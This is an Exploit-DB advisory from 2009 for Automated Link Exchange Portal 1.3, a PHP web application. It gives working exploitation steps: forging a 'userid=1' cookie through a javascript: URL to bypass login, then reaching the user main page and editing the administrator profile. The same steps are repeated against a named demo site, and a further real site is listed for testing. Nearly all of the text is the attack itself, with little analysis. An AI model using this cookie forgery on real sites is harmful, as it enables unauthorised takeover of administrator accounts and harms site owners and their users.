Automated link exchange portal 1.3 - Multiple Vulnerabilities

EDB-ID:

8904

CVE:

N/A


Author:

TiGeR-Dz

Type:

webapps


Platform:

PHP

Date:

2009-06-08


-------------------------------------------------------------------------
 Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities
 ---------------------------------------------------------------
 Founder : TiGeR-Dz
 Home:www.h4ckx.com
 Script: Automated Link Exchange Portal Version 1.3
 Download:http://www.cmsnx.com/product.demo.php?id=11
 alf mabroke bfowze al montakhabe alwatany :D
 ---------------------------------------------------------------
 Exploit
 -------
 Note:Follow these steps
 
 after enter the cookie (javascript:document.cookie="userid=1;path=/";) and go 
 to login http://www.site.com/[path]/user.mainpage.php and change profile admin at 
  http://www.site.com/[path]/user.edit.account.php 

 exploit= cookie handling + Bypass login + change profile :)
 --------------------------------------------------------------
 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

 -------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.site.com/[path]/user.mainpage.php
 
 ----------------------------------------------------------------
 
 change profile Admin :
 ----------------------------

 http://www.site.com/[path]/user.edit.account.php 

----------------------------------------------------------
 Dem0
 ----
 http://www.kalptarudemos.com/demo/linkspile/
----------------------------------------------------------------

 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

-------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.kalptarudemos.com/demo/linkspile/user.mainpage.php
 
 ----------------------------------------------------------------
 
 change profile Admin :
 ----------------------------

 http://www.kalptarudemos.com/demo/linkspile/user.edit.account.php

----------------------------------------------------------

test:
--------

http://www.linkspile.com/
---------------------------------------------------------------

 Greeting To ALL My Friends (Dz)
 -----------------------------------------------------------------

# milw0rm.com [2009-06-08]